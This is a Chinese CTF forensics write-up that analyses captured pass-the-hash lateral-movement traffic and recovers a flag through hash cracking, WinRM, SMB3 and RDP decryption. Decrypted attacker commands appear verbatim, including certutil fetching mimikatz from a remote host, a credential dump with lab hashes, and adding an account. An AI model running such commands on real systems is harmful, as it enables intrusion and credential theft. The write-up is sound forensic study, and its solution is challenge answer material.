软件系统安全赛pth_attack复盘
前言
南京大学的人文关怀是真没得说。校园环境优美,午餐鸡腿美味,还有饼干、面包等小零食,吃爽了。但这比赛也是挺抽象的,午饭时,我一开始还天真的认为主办方为了让我们好好休息,专心吃饭特意把网站关了,懂得都懂。。。
pth_attack
题目描述
捕获到公司内网有横向移动的攻击流量,请分析攻击者做了什么。(提交dart{}内的内容即可)
题解
比赛时思路
题目给了两个压缩包,第一个压缩包是winrm和smb流量
可以看到有大量的SMB认证请求,可以判断是在爆破administrator的密码
直接找到爆破成功的包
从3294之后,SMB开始加密传输,说明在这里认证成功了,提取出NTLMv2的哈希
可以用这个工具把流量中所有NTLMv2的哈希全部提出来mlgualtieri/NTLMRawUnHide
也可以手动提取
NTLMv2的格式为:`username::domain:challenge:HMAC-MD5:blob
challenge为NTLM Server Challenge,domian由数据包内容获得(IP或者机器名)
HMAC-MD5对应数据包中的NTProofStrz
blob对应数据包中Response去掉NTProofStr的后半部分
详细提取过程可以参考这篇文章
Windows下的密码hash——NTLM hash和Net-NTLM hash介绍 - husterlong - 博客园
administrator:::9d92b46171a87637:4103e8d84572fa74f220ecc20be704c1:010100000000000048bac1a9bc72dc01447637675159784300000000010004004400430002000a004400450031004100590003001800440043002e00640065003100610079002e0063006f006d0004001200640065003100610079002e0063006f006d0005001200640065003100610079002e0063006f006d000700080048bac1a9bc72dc0109000e0063006900660073002f00440043000000000000000000
然后用rockyou爆破,可惜是强密码,没爆出来
hashcat -m 5600 ad5_hash.txt rockyou.txt
同理SMB后面admin的哈希也爆不出来
于是我把目标放回到HTTP流,提取出NTLMv2的哈希
administrator::pc:8317e378f3d84c16:eac0fa03a412b0a3d029dcea2a386231:01010000000000002abaa933bc72dc01592e32c3bb93f0fe0000000002000a0044004500310041005900010004005000430004001200640065003100610079002e0063006f006d0003001800500043002e00640065003100610079002e0063006f006d0005001200640065003100610079002e0063006f006d00070008002abaa933bc72dc010600040002000000080030003000000000000000000000000030000026544cc05c735b21ae876ab6adeaf35030fb649315896d1d685326c99ddb5f6b0a001000000000000000000000000000000000000900220048005400540050002f00310030002e00310030002e00310030002e00320030003100000000000000000000000000
hashcat -m 5600 ad4_hash.txt rockyou.txt --show
爆出来密码是pass@word1
拿到了密码就可以解密winrm流量了,这里用到了h4sh5/decrypt-winrm
python winrm_decrypt.py -p pass@word1 1-pth.pcapng
解密出来powershell命令,写个脚本提取并解码一下
import re
import base64
with open("pass@word1.txt", "r", encoding="utf-8") as f:
text=f.read()
pattern = r'(?<![A-Za-z0-9+/=])(?:[A-Za-z0-9+/]{4}){2,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?(?![A-Za-z0-9+/=])'
matches = re.findall(pattern, text)
for i,s in enumerate(matches, 1):
try:
payload = base64.b64decode(s).decode("utf-8")
if payload and payload[0].isalnum():
print(payload, end="\n-------------------\n")
except UnicodeDecodeError:
pass
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator.PC>pc\administrator
C:\Users\Administrator.PC>
Windows IP 配置
主机名 . . . . . . . . . . . . . : PC
主 DNS 后缀 . . . . . . . . . . . : de1ay.com
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
DNS 后缀搜索列表 . . . . . . . . : de1ay.com
以太网适配器 本地连接 5:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #5
物理地址. . . . . . . . . . . . . : 52-54-00-41-4A-45
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::d8db:a779:15b7:3086%20(首选)
IPv4 地址 . . . . . . . . . . . . : 10.10.10.201(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 458380288
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-25-07-6C-31-00-0C-29-9E-7B-70
DNS 服务器 . . . . . . . . . . . : 10.10.10.10
TCPIP 上的 NetBIOS . . . . . . . : 已启用
以太网适配器 本地连接 4:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #4
物理地址. . . . . . . . . . . . . : 52-54-00-41-4A-44
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::9176:1eee:fe21:d554%19(首选)
IPv4 地址 . . . . . . . . . . . . : 192.168.242.63(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.242.168
DHCPv6 IAID . . . . . . . . . . . : 408048640
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-25-07-6C-31-00-0C-29-9E-7B-70
DNS 服务器 . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
TCPIP 上的 NetBIOS . . . . . . . : 已启用
以太网适配器 本地连接 3:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #3
物理地址. . . . . . . . . . . . . : 52-54-00-41-4A-46
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是
本地站点的 IPv6 地址. . . . . . . : fec0::9131:a939:1e87:ccd0%1(首选)
本地链接 IPv6 地址. . . . . . . . : fe80::9131:a939:1e87:ccd0%18(首选)
IPv4 地址 . . . . . . . . . . . . : 10.0.2.15(首选)
子网掩码 . . . . . . . . . . . . : 255.255.255.0
获得租约的时间 . . . . . . . . . : 2025年12月22日 4:13:51
租约过期的时间 . . . . . . . . . : 2025年12月23日 4:14:46
默认网关. . . . . . . . . . . . . : fe80::2%18
DHCP 服务器 . . . . . . . . . . . : 10.0.2.2
DNS 服务器 . . . . . . . . . . . : 10.0.2.3
TCPIP 上的 NetBIOS . . . . . . . : 已启用
隧道适配器 isatap.{B0504C3B-D107-4C24-B009-551D39B58C97}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 isatap.{C6A0F3CF-2827-44DC-B60B-D8332C4938AA}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
隧道适配器 isatap.{68DFDB8C-CD53-4196-85E5-6E8EA5138D07}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3
物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP 已启用 . . . . . . . . . . . : 否
自动配置已启用. . . . . . . . . . : 是
C:\Users\Administrator.PC>**** 联机 ****
CertUtil: -URLCache 命令成功完成。
C:\Users\Administrator.PC>
比赛的时候做到这里,以为题目出错了,winrm里都没什么有用的信息。
赛后复盘
看了大佬的wp才发现问题
winrm解密脚本遇到错误帧会直接报错停止,导致后续的没有解密,让AI改了一下
重新提取并解密
whoami
-------------------
pc\administrator
-------------------
C:\Users\Administrator.PC>
-------------------
ipconfig /all
-------------------
C:\Users\Administrator.PC>
-------------------
certutil -urlcache -f http://10.10.10.80:8000/mimikatz.exe mimikatz.exe
-------------------
C:\Users\Administrator.PC>
-------------------
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" > 1.log
-------------------
C:\Users\Administrator.PC>
-------------------
a Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords full
Authentication Id : 0 ; 918546 (00000000:000e0412)
Session : RemoteInteractive from 2
User Name : administrator
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:43:03
SID : S-1-5-21-2756371121-2868759905-3853650604-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : DE1AY
* LM : 4885d2c71db12bab1eba5e9d51b4aa9c
* NTLM : 3d83254b53697355ef7498b535e7ab29
* SHA1 : a08ec5f6abc5d3bf6497d3aa3370f6ff37548d0b
tspkg :
* Username : Administrator
* Domain : DE1AY
* Password :
wdigest :
* Username : Administrator
* Domain : DE1AY
* Password :
kerberos :
* Username : administrator
* Domain : DE1AY.COM
* Password :
ssp :
credman :
Authentication Id : 0 ; 712045 (00000000:000add6d)
Session : NetworkCleartext from 0
User Name : de1ay
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:36:31
SID : S-1-5-21-2756371121-2868759905-3853650604-1001
msv :
[00000003] Primary
* Username : de1ay
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : de1ay
* Domain : DE1AY
* Password :
wdigest :
* Username : de1ay
* Domain : DE1AY
* Password :
kerberos :
* Username : de1ay
* Domain : DE1AY.COM
* Password :
ssp :
credman :
Authentication Id : 0 ; 709503 (00000000:000ad37f)
Session : Service from 0
User Name : sshd_3212
Domain : VIRTUAL USERS
Logon Server : (null)
Logon Time : 2025/12/22 4:36:30
SID : S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-3212
msv :
[00000003] Primary
* Username : PC$
* Domain : DE1AY
* NTLM : 656ea538d9cf1c85a57bbac5a5020ffd
* SHA1 : a9cf2cc0fafdb001bd121d53c665340ed208ffc2
tspkg :
* Username : PC$
* Domain : DE1AY
* Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
wdigest :
* Username : PC$
* Domain : DE1AY
* Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
kerberos :
* Username : PC$
* Domain : de1ay.com
* Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
ssp :
credman :
Authentication Id : 0 ; 623891 (00000000:00098513)
Session : NetworkCleartext from 0
User Name : de1ay
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:28:24
SID : S-1-5-21-2756371121-2868759905-3853650604-1001
msv :
[00000003] Primary
* Username : de1ay
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : de1ay
* Domain : DE1AY
* Password :
wdigest :
* Username : de1ay
* Domain : DE1AY
* Password :
kerberos :
* Username : de1ay
* Domain : DE1AY.COM
* Password :
ssp :
credman :
Authentication Id : 0 ; 621283 (00000000:00097ae3)
Session : Service from 0
User Name : sshd_3568
Domain : VIRTUAL USERS
Logon Server : (null)
Logon Time : 2025/12/22 4:28:15
SID : S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-3568
msv :
[0000
-------------------
0003] Primary
* Username : PC$
* Domain : DE1AY
* NTLM : 656ea538d9cf1c85a57bbac5a5020ffd
* SHA1 : a9cf2cc0fafdb001bd121d53c665340ed208ffc2
tspkg :
* Username : PC$
* Domain : DE1AY
* Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
wdigest :
* Username : PC$
* Domain : DE1AY
* Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
kerberos :
* Username : PC$
* Domain : de1ay.com
* Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
ssp :
credman :
Authentication Id : 0 ; 475572 (00000000:000741b4)
Session : CachedInteractive from 1
User Name : de1ay
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:21:19
SID : S-1-5-21-2756371121-2868759905-3853650604-1001
msv :
[00000003] Primary
* Username : de1ay
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : de1ay
* Domain : DE1AY
* Password :
wdigest :
* Username : de1ay
* Domain : DE1AY
* Password :
kerberos :
* Username : de1ay
* Domain : DE1AY.COM
* Password :
ssp :
credman :
Authentication Id : 0 ; 449071 (00000000:0006da2f)
Session : CachedInteractive from 1
User Name : de1ay
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:20:34
SID : S-1-5-21-2756371121-2868759905-3853650604-1001
msv :
[00000003] Primary
* Username : de1ay
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : de1ay
* Domain : DE1AY
* Password :
wdigest :
* Username : de1ay
* Domain : DE1AY
* Password :
kerberos :
* Username : de1ay
* Domain : DE1AY.COM
* Password :
ssp :
credman :
Authentication Id : 0 ; 312952 (00000000:0004c678)
Session : Interactive from 1
User Name : mssql
Domain : DE1AY
Logon Server : DC
Logon Time : 2025/12/22 4:18:16
SID : S-1-5-21-2756371121-2868759905-3853650604-2103
msv :
[00000003] Primary
* Username : mssql
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : mssql
* Domain : DE1AY
* Password :
wdigest :
* Username : mssql
* Domain : DE1AY
* Password :
kerberos :
* Username : mssql
* Domain : DE1AY.COM
* Password :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/12/22 4:13:20
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : PC$
Domain : DE1AY
Logon Server : (null)
Logon Time : 2025/12/22 4:13:18
SID : S-1-5-20
msv :
[00000003] Primary
* Username : PC$
* Domain : DE1AY
* NTLM : 656ea538d9cf1c85a57bbac5a5020ffd
* SHA1 : a9cf2cc0fafdb001bd121d53c665340ed208ffc2
tspkg :
wdigest :
* Username : PC$
* Domain : DE1AY
* Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
kerberos :
* Username : pc$
* Domain :
-------------------
DE1AY.COM
* Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
ssp :
credman :
Authentication Id : 0 ; 28405 (00000000:00006ef5)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/12/22 4:13:02
SID :
msv :
[00000003] Primary
* Username : PC$
* Domain : DE1AY
* NTLM : 656ea538d9cf1c85a57bbac5a5020ffd
* SHA1 : a9cf2cc0fafdb001bd121d53c665340ed208ffc2
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : PC$
Domain : DE1AY
Logon Server : (null)
Logon Time : 2025/12/22 4:13:01
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : PC$
* Domain : DE1AY
* Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
kerberos :
* Username : pc$
* Domain : DE1AY.COM
* Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
ssp :
credman :
mimikatz(commandline) # exit
Bye!
C:\Users\Administrator.PC>
-------------------
可以看到攻击者落地了mimikatz爬取了凭证,拿到了administrator的NTLM哈希
[00000003] Primary
* Username : Administrator
* Domain : DE1AY
* LM : 4885d2c71db12bab1eba5e9d51b4aa9c
* NTLM : 3d83254b53697355ef7498b535e7ab29
* SHA1 : a08ec5f6abc5d3bf6497d3aa3370f6ff37548d0b
拿到NTLM哈希后就可以生成session key来解密smb3了
from Crypto.Cipher import ARC4
from Crypto.Hash import MD4, MD5, HMAC
# password = 'babygirl233'
# passwordHash = MD4.new(password.encode('utf-16-le')).hexdigest()
passwordHash = '3d83254b53697355ef7498b535e7ab29'
username = 'administrator'
domain = ''
ntProofStr = '4103e8d84572fa74f220ecc20be704c1'
serverChallenge = '9d92b46171a87637'
sessionKey = '7433d4ac87cdff2d38b2e8a5840b919d'
sessionId = "0000480000000055"
# wireshark中sessionId是小端序的
def reverse_hex_bytes(hex_string):
return ''.join([hex_string[i:i+2] for i in range(0, len(hex_string), 2)][::-1])
sessionId = reverse_hex_bytes(sessionId)
print('Reversed Session ID is: {}'.format(sessionId))
responseKey = HMAC.new(bytes.fromhex(passwordHash), (username.upper()+domain.upper()).encode('utf-16-le'), MD5).digest()
keyExchangeKey = HMAC.new(responseKey, bytes.fromhex(ntProofStr), MD5).digest()
decryptedSessionKey = ARC4.new(keyExchangeKey).decrypt(bytes.fromhex(sessionKey))
print('Decrypted SMB Session Key is: {}'.format(decryptedSessionKey.hex()))
output:
Reversed Session ID is: 5500000000480000
Decrypted SMB Session Key is: 3252507a61756f507132585748475953
在3347个包中发现执行了命令
%COMSPEC% /Q /c echo net user admin kPxQ1GT9zA9E /add ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
可以看到amdin的明文密码是kPxQ1GT9zA9E
导入密码后,Wireshark会自动算出 SMB3 会话密钥,自动解密这个用户名下所有 SMB3 加密流量
拿到了两个证书
pfx中有私钥,提取出来
openssl pkcs12 -in 1.pfx -out private.key -nodes
这是mimikatz导出的证书,密码就是默认的mimikatz
把私钥导入第二个流量包中解密rdp
把rdp的流量全部导出,格式为json
rdp.fastpath.scancode.keycode对应的是键盘流量,提取并整理一下
cat 1.json | grep rdp.fastpath.scancode.keycode | awk -F ":" '{print $2 ","}'
解密
def map_keycode(key_code):
"""根据扫描码返回相应的字符或描述"""
# 特殊键的映射
special_keys = {
0x00: 'None', # No key
0x01: 'Esc', # Esc
0x02: '1', # 1
0x03: '2', # 2
0x04: '3', # 3
0x05: '4', # 4
0x06: '5', # 5
0x07: '6', # 6
0x08: '7', # 7
0x09: '8', # 8
0x0A: '9', # 9
0x0B: '0', # 0
0x0C: '-', # -
0x0D: '=', # =
0x0E: 'Backspace', # Backspace
0x0F: 'Tab', # Tab
0x10: 'Q', # Q
0x11: 'W', # W
0x12: 'E', # E
0x13: 'R', # R
0x14: 'T', # T
0x15: 'Y', # Y
0x16: 'U', # U
0x17: 'I', # I
0x18: 'O', # O
0x19: 'P', # P
0x1A: '[', # [
0x1B: ']', # ]
0x1C: 'Enter', # Enter
0x1D: 'Left Ctrl', # Left Control
0x1E: 'A', # A
0x1F: 'S', # S
0x20: 'D', # D
0x21: 'F', # F
0x22: 'G', # G
0x23: 'H', # H
0x24: 'J', # J
0x25: 'K', # K
0x26: 'L', # L
0x27: ';', # ;
0x28: "'", # '
0x29: 'Grave', # `
0x2A: 'Left Shift', # Left Shift
0x2B: 'Backslash', # \
0x2C: 'Z', # Z
0x2D: 'X', # X
0x2E: 'C', # C
0x2F: 'V', # V
0x30: 'B', # B
0x31: 'N', # N
0x32: 'M', # M
0x33: ',', # ,
0x34: '.', # .
0x35: '/', # /
0x36: 'Right Shift', # Right Shift
0x37: 'Keypad *', # Keypad *
0x38: 'Alt', # Alt
0x39: 'Space', # Space
0x3A: 'Caps Lock', # Caps Lock
0x3B: 'F1', # F1
0x3C: 'F2', # F2
0x3D: 'F3', # F3
0x3E: 'F4', # F4
0x3F: 'F5', # F5
0x40: 'F6', # F6
0x41: 'F7', # F7
0x42: 'F8', # F8
0x43: 'F9', # F9
0x44: 'F10', # F10
0x45: 'F11', # F11
0x46: 'F12', # F12
0x47: 'Num Lock', # Num Lock
0x48: 'Keypad 7', # Keypad 7
0x49: 'Keypad 8', # Keypad 8
0x4A: 'Keypad 9', # Keypad 9
0x4B: 'Keypad -', # Keypad -
0x4C: 'Keypad 4', # Keypad 4
0x4D: 'Keypad 5', # Keypad 5
0x4E: 'Keypad 6', # Keypad 6
0x4F: 'Keypad +', # Keypad +
0x50: 'Keypad 1', # Keypad 1
0x51: 'Keypad 2', # Keypad 2
0x52: 'Keypad 3', # Keypad 3
0x53: 'Keypad 0', # Keypad 0
0x54: 'Keypad .', # Keypad .
0x5B: 'Left Win', # Left Windows
0x5C: 'Right Win', # Right Windows
0x5D: 'Menu', # Menu
0x5E: 'Right Ctrl', # Right Control
0x5F: 'Right Alt', # Right Alt
}
return special_keys.get(key_code, f"Unknown key code: {key_code}")
def process_keyboard_data(data):
"""处理键盘输入数据,返回对应的按键描述"""
output = []
for entry in data:
# 分割扫描码并转换为整数
key_codes = entry.split(',')
mapped_keys = [map_keycode(int(code, 16)) for code in key_codes]
output.append(' '.join(mapped_keys))
return output
# 示例键盘输入数据
keyboard_data = [
"0x0f"
,"0x2a"
,"0x36"
,"0x1d"
,"0x1d"
,"0x0f"
,"0x38"
,"0x0f"
,"0x38"
,"0x0f"
,"0x0f"
,"0x2a"
,"0x36"
,"0x1d"
,"0x1d"
,"0x0f"
,"0x38"
,"0x0f"
,"0x38"
,"0x0f"
,"0x0f"
,"0x2a"
,"0x36"
,"0x1d"
,"0x1d"
,"0x0f"
,"0x38"
,"0x0f"
,"0x38"
,"0x0f"
,"0x0f"
,"0x2a"
,"0x36"
,"0x1d"
,"0x1d"
,"0x0f"
,"0x38"
,"0x0f"
,"0x38"
,"0x0f"
,"0x23"
,"0x12"
,"0x23"
,"0x12"
,"0x13"
,"0x12"
,"0x13"
,"0x12"
,"0x39"
,"0x39"
,"0x17"
,"0x1f"
,"0x17"
,"0x39"
,"0x1f"
,"0x39"
,"0x21"
,"0x26"
,"0x21"
,"0x1e"
,"0x26"
,"0x1e"
,"0x22"
,"0x22"
,"0x1c"
,"0x1c"
,"0x20"
,"0x1e"
,"0x20"
,"0x1e"
,"0x13"
,"0x13"
,"0x14"
,"0x14"
,"0x2a"
,"0x1a"
,"0x1a"
,"0x2a"
,"0x06"
,"0x06"
,"0x30"
,"0x30"
,"0x04"
,"0x04"
,"0x1e"
,"0x1e"
,"0x07"
,"0x07"
,"0x05"
,"0x05"
,"0x02"
,"0x02"
,"0x21"
,"0x21"
,"0x0c"
,"0x0c"
,"0x0a"
,"0x0a"
,"0x05"
,"0x05"
,"0x06"
,"0x06"
,"0x05"
,"0x05"
,"0x0c"
,"0x0c"
,"0x05"
,"0x05"
,"0x06"
,"0x06"
,"0x02"
,"0x02"
,"0x09"
,"0x09"
,"0x0c"
,"0x0c"
,"0x1e"
,"0x1e"
,"0x09"
,"0x09"
,"0x06"
,"0x06"
,"0x20"
,"0x20"
,"0x0c"
,"0x0c"
,"0x07"
,"0x07"
,"0x21"
,"0x21"
,"0x08"
,"0x08"
,"0x20"
,"0x20"
,"0x05"
,"0x05"
,"0x20"
,"0x20"
,"0x07"
,"0x07"
,"0x12"
,"0x12"
,"0x1e"
,"0x1e"
,"0x12"
,"0x12"
,"0x21"
,"0x21"
,"0x30"
,"0x30"
,"0x2a"
,"0x2a"
,"0x2a"
,"0x1b"
,"0x1b"
,"0x2a"
,"0x1c"
,"0x1c"
,"0x20"
,"0x18"
,"0x20"
,"0x18"
,"0x31"
,"0x31"
,"0x12"
,"0x12"
,"0x0f"
,"0x5b"
,"0x5c"
,"0x2a"
,"0x36"
,"0x1d"
,"0x1d"
,"0x0f"
,"0x38"
,"0x0f"
,"0x38"
,"0x0f"
]
# 处理每行数据
keyboard_output = process_keyboard_data(keyboard_data)
# 相邻重复通常是按下/弹起事件,去重后保留一次有效按键
deduped_output = []
for key in keyboard_output:
if not deduped_output or deduped_output[-1] != key:
deduped_output.append(key)
# 输出去重后拼接结果
joined_output = ' '.join(deduped_output)
print(joined_output)
output:
Tab Left Shift Right Shift Left Ctrl Tab Alt Tab Alt Tab Left Shift Right Shift Left Ctrl Tab Alt Tab Alt Tab Left Shift Right Shift Left Ctrl Tab Alt Tab Alt Tab Left Shift Right Shift Left Ctrl Tab Alt Tab Alt Tab H E H E R E R E Space I S I Space S Space F L F A L A G Enter D A D A R T Left Shift [ Left Shift 5 B 3 A 6 4 1 F - 9 4 5 4 - 4 5 1 8 - A 8 5 D - 6 F 7 D 4 D 6 E A E F B Left Shift ] Left Shift Enter D O D O N E Tab Left Win Right Win Left Shift Right Shift Left Ctrl Tab Alt Tab Alt Tab
整理一下
dart{5B3A641F-9454-4518-A85D-6F7D4D6EAEFB}
参考
https://mp.weixin.qq.com/s/6OHYcl0FUwgnp4uu66fT4Q
https://bili33.top/posts/CTF-CCSSSC2026-Regional-Semi-Finals/
浙公网安备 33010602011771号